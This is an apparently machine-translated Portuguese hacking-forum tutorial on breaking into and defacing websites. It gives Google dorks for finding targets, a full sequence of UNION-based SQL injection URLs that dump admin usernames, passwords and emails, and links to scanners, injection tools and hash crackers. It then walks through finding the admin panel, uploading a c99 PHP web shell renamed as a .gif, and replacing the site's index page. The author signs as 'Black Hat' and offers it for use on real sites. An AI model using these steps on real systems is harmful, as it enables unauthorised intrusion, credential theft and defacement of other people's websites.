URL:

Opção :




tutorial sql injection

SQL Injection


Desfigurar UM SITE EXPLICADO DESDE O INÍCIO
(DOWNLOADS INCLUINDO)


Eu tomei algumas partes do sql injeção de http://www.milw0rm.com/ . Eu escrevi a parte desfigurar. Estou postando isso aqui coz este tut explica tudo passo a passo.mas a maioria dos tuts sql termina quando encontramos o hash de senha. Então newbees dnt sei wat fazer depois disso. Neste tut eu vou explicar como desfigurar um site a partir do zero espero que você encontrar este útil preencher ....
eu não sou um hacker bom, mas eu quero compartilhar meu conhecimento com cada um .. por isso, se houver algum erro pls me perdoe ....
Se você encontrar este útil tut favor postar um comentário .... Black Hat

1) encontrar o alvo e obter a senha de administrador

Primeiro temos de encontrar o nosso site-alvo para fazer isso você pode usar este "idiotas".
Vou dar alguns idiotas aqui copiar ninguém dela e colá-lo no google e pesquisa.
Código:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=

você pode encontrar lotes de dorks aqui .. (usá-los sem as "marcas")
Código:
http://spam.org/download.php?file=390326

1). Verifique a existência de vulnerabilidade

Vamos dizer que temos algum site como este

http://www.site.com/news.php?id=5

Agora, para testar se é vulrnable somarmos ao final do url '(citação),

e que seria http://www.site.com/news.php?id=5%27

por isso, se ter um erro parecido
"Você tem um erro em sua sintaxe SQL; verifique o manual que corresponde à sua versão do servidor MySQL para a direita etc ..."
ou algo semelhante

que isto significa é vulrnable para sql injection :)

2). Encontre o número de colunas

Para encontrar o número de colunas que usamos declaração ORDER BY (diz a banco de dados como encomendar o resultado)

assim como usá-lo? Bem apenas incrementar o número até chegarmos um erro.

http://www.site.com/news.php?id=5 ordem de 1 / * <- nenhum erro

http://www.site.com/news.php?id=5 ordem de 2 / * <- nenhum erro

http://www.site.com/news.php?id=5 ordem de 3 / * <- nenhum erro

http://www.site.com/news.php?id=5 ordem de 4 / * <- erro (obtemos mensagem como esta coluna Unknown '4' em 'cláusula de ordem "ou algo parecido)

que significa que o que tem 3 colunas, porque temos um erro de 4.

3). Verifique se há função UNIÃO

Com união podemos selecionar mais dados em uma instrução SQL.

por isso temos

http://www.site.com/news.php?id=5 união todas selecionar 1,2,3 / * (que já descobriram que o número de colunas são 3 na seção 2). )

se vemos alguns números na tela, ou seja, 1 ou 2 ou 3, em seguida, as obras UNIÃO :)

4). Verifique se há versão MySQL

http://www.site.com/news.php?id=5 união todas selecionar 1,2,3 / * NOTA: se / * não está funcionando ou você receber algum erro, então tente -
é um comentário e é importante para a nossa consulta para funcionar corretamente.

vamos dizer que temos o número 2 na tela, agora para verificar a versão
substituímos o número 2 com@@version ou versão () e obter como someting 4.1.33-log ou 5.0.45 ou similar.

ele deve ficar assim http://www.site.com/news.php?id=5 união todas selecionar 1,@@version, 3 / *

se você receber um erro de "união + mix ilegal de agrupamentos (+ coercible implícita) ..."

Eu não vi nenhum papel que cobre este problema, então eu preciso escrevê-lo :)

o que precisamos é função de conversão ()

ou seja,

http://www.site.com/news.php?id=5 união todas selecionar 1, converter (versão@@usando latin1), 3 / *

ou hexagonal com () e unhex ()

ou seja,

http://www.site.com/news.php?id=5 união todas selecionar 1, unhex (hex (@@version)), 3 / *

e você vai ter versão do MySQL: D

5). Conseguir mesa e coluna nome

bem, se a versão do MySQL é <5 (ou seja, 4.1.33, 4.1.12 ...) <--- depois vou descrever para o MySQL> 5 versão.
devemos supor tabela eo nome da coluna, na maioria dos casos.

nomes de tabelas comuns são: user / s, admin / s, membro / s ...

nomes das colunas comuns são: nome de usuário, usuário, usr, user_name, password, passar, passwd, pwd etc ...

ou seja, seria

http://www.site.com/news.php?id=5 união todas selecionar 1,2,3 de admin / * (vemos o número 2 na tela como antes, e isso é bom: D)

sabemos que a tabela de administração existe ...


agora para verificar os nomes das colunas.


http://www.site.com/news.php?id=5 união todas selecionar 1, username, 3 de admin / * (se você receber um erro, então tente o outro nome da coluna)

obtemos nome de usuário exibido na tela, exemplo seria admin, ou superadmin etc ...

agora para verificar se a senha coluna existe

http://www.site.com/news.php?id=5 união todas selecionar 1, senha, 3 de admin / * (se você receber um erro, então tente o outro nome da coluna)

vimos senha na tela de hash ou de texto simples, que depende de como o banco de dados está configurado :)

ou seja, hash MD5, mistura mysql, sha1 ...

agora temos que completar consulta para procurar nice :)

para que possamos utilizar concat () função (se junta cordas)

ou seja,

http://www.site.com/news.php?id=5 união todas selecionar 1, concat (username, 0x3a, password), 3 de admin / *

Note que eu coloquei 0x3a, o seu valor hexadecimal para: (assim 0x3a é o valor hexadecimal de dois pontos)

(Não há outro caminho para que, char (58), o valor ascii para:)


http://www.site.com/news.php?id=5 união todas selecionar 1, concat (username, char (58), password), 3 de admin / *

agora temos nome de usuário dislayed: senha na tela, ou seja, administrador: admin ou admin: somehash

quando você tem isso, você pode fazer login como administrador ou algum superusuário: D

se não pode adivinhar o nome da tabela à direita, você pode sempre tentar mysql.user (default)

ele tem usuário i colunas de senha, de modo exemplo seria

http://www.site.com/news.php?id=5 união todas selecionar 1, concat (usuário, 0x3a, password), 3 de mysql.user / *

6). MySQL 5

Como eu disse antes eu vou explicar como obter os nomes de tabelas e colunas
em MySQL> 5.

Para isso, precisamos information_schema. Ele mantém todas as tabelas e colunas no banco de dados.

para obter as tabelas que usamos nome_tabela e information_schema.tables.

ou seja,

http://www.site.com/news.php?id=5 união todas selecionar 1, table_name, 3 de information_schema.tables / *

aqui vamos substituir o nosso número 2 com nome_tabela para obter a primeira tabela de information_schema.tables

exibida na tela. Agora devemos adicionar limite para o fim da consulta para listar todas as tabelas.

ou seja,

http://www.site.com/news.php?id=5 união todas selecionar 1, table_name, 3 de information_schema.tables 0,1 / *

note que eu coloquei 0,1 (obter um resultado a partir do 0)

agora para ver a segunda tabela, mudamos limite de 0,1 para limitar 1,1

ou seja,

http://www.site.com/news.php?id=5 união todas selecionar 1, table_name, 3 de information_schema.tables 1,1 / *

a segunda tabela é exibida.

para terceira tabela que colocamos limitar 2,1

ou seja,

http://www.site.com/news.php?id=5 união todas selecionar 1, table_name, 3 de information_schema.tables 2,1 / *

manter incrementando até chegar alguns útil como db_admin, poll_user, auth, AUTH_USER etc ...: D

Para obter os nomes das colunas, o método é o mesmo.

aqui usamos column_name e INFORMATION_SCHEMA.COLUMNS

o método é o mesmo que acima exemplo seria assim


http://www.site.com/news.php?id=5 união todas selecionar 1, column_name, 3 de INFORMATION_SCHEMA.COLUMNS 0,1 / *

a primeira coluna é diplayed.

o segundo (mudamos limite de 0,1 para limitar 1,1)

isto é.


http://www.site.com/news.php?id=5 união todas selecionar 1, column_name, 3 de INFORMATION_SCHEMA.COLUMNS limitar 1,1 / *

a segunda coluna é apresentado, de modo a manter incrementando até chegar algo como

nome de usuário, usuário, login, senha, passar, passwd etc ...: D

se vocês os nomes das colunas de exibição wanna tabela específica para utilizar esta consulta. (Cláusula WHERE)

vamos dizer que encontramos os usuários da tabela.

ou seja,

http://www.site.com/news.php?id=5 união todas selecionar 1, column_name, 3 de INFORMATION_SCHEMA.COLUMNS onde table_name = 'users' / *

Agora temos mostrado nome da coluna na tabela usuários. Basta usar LIMIT podemos listar todas as colunas na tabela de usuários.

Note que isto não irá funcionar se os magic quotes é ON.

vamos dizer que encontramos colums usuário, passar e-mail.

Agora para completar consulta para colocá-los todos juntos: D

para que nós usamos concat (), i descrevê-lo mais cedo.

ou seja,


http://www.site.com/news.php?id=5 união todas selecionar 1, concat (usuário, 0x3a, passar, 0x3a, e-mail) de usuários / *

o que temos aqui é user: pass: e-mail de usuários da tabela.

exemplo: admin: hash de: whatever@blabla.com

** Se você é preguiçoso demais para fazer acima coisas que você pode usar as ferramentas que eles vão fazer todo o trabalho:
1) Exploit scanner (isso irá encontrar sites vulneráveis)
Código:
http://spam.org/download.php?file=390338
2) SQLi helpper (esta ferramenta irá fazer todo o trabalho de injecção e que você obtenha o passe ou o hash)
Código:
http://rapidshare.com/files/248029073/SQLIHelperV.2.7.rar
*** Usar as ferramentas somente se você é novo para hacking. Fazê-lo manualmente isso é a emoção e isso é pirataria real. Quando você fazer isso manualmente, você vai entender o conceito.

em alguns sites que você pode ver diretamente a senha. mas a maioria dos sites de criptografá-los usando MD5. so u hav para quebrar o hash para obter a senha.para quebrar a senha, existem três maneiras
1) verificar o líquido se este hash é rachado antes:
Código:
http://www.md5decrypter.co.uk
2) quebrar a senha com a ajuda de um site:
Código:
http://www.milw0rm.com/cracker/insert.php
http://passcracking.com/index.php
3) usar um software rachaduras MD5:
Código:
http://rapidshare.com/files/136967969/a_MD5CF_2.10_2b.rar
Password = OwlsNest


2) desfigurar DO SITE

depois de obter a senha que você pode fazer login como administrador do site. Mas primeiro você tem que encontrar a página de login de administrador para o site. há r três métodos para encontrar o painel de administração.
1) você pode usar um site de administração localizador:
Código:
http://4dm1n.houbysoft.com/
2) você pode usar um software de administração localizador:
Código:
http://spam.org/download.php?file=390339

após o login como o administrador pode fazer upload de fotos para o site. então agora você está indo para carregar um shell para o site usando essa facilidade de upload.

dowload o shell aqui (conchas são scripts PHP que afeta sites por isso será detectado como trojans, mas não precisa se preocupar eu assumir a responsabilidade):
Código:
http://spam.org/download.php?file=390328
extraí-lo você receberá um c99.php carregá-lo.
alguns sites não vai permitir que você faça o upload de um arquivo php. então renomeá-lo como c99.php.gif
em seguida, carregá-lo.

depois que vão para http://www.site.com/images (na maioria dos sites de imagens são guardadas nesta dir mas se você não puder encontrar c99 lá, então você tem que adivinhar a dir)
encontrar o c99.php.gif e clique nele ..
Agora você pode ver um painel grande controle ....
Agora você pode fazer o que quiser fazer ...
procurar o arquivo index.html e substituí-lo por seu próprio arquivo. por isso, se qualquer um vai para o site que eles vão ver sua página ....

Compartilhar usando :

DEIXE SEU COMENTARIO :

Comentarios - Mundo Hacker | Facebook-copyright(™ © ®)